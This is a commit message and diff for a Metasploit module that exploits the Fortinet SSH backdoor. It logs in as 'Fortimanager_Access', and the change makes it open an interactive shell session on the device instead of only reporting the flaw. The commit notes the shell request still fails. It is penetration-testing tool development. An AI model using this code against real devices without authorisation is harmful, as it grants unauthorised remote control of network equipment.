Use start_session in fortinet_backdoor

Still get "Unknown admin user ''" from a shell channel request,
@busterb's more complete implementation notwithstanding.

Hoping we fix this in a subsequent commit or related PR.

Please see #6612 and #9524.

modules/auxiliary/scanner/ssh/fortinet_backdoor.rb

@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SSH
   include Msf::Exploit::Remote::Fortinet
   include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -63,15 +64,30 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    if ssh
+    return unless ssh
-      print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+
-      report_vuln(
+    print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
-        host: ip,
+
-        name: self.name,
+    version = ssh.transport.server_version.version
-        refs: self.references,
+
-        info: ssh.transport.server_version.version
+    report_vuln(
-      )
+      host: ip,
-    end
+      name: self.name,
+      refs: self.references,
+      info: version
+    )
+
+    shell = Net::SSH::CommandStream.new(ssh)
+
+    return unless shell
+
+    info = "Fortinet SSH Backdoor (#{version})"
+
+    ds_merge = {
+      'USERNAME' => 'Fortimanager_Access'
+    }
+
+    start_session(self, info, ds_merge, false, shell.lsock)
   end
 
   def rport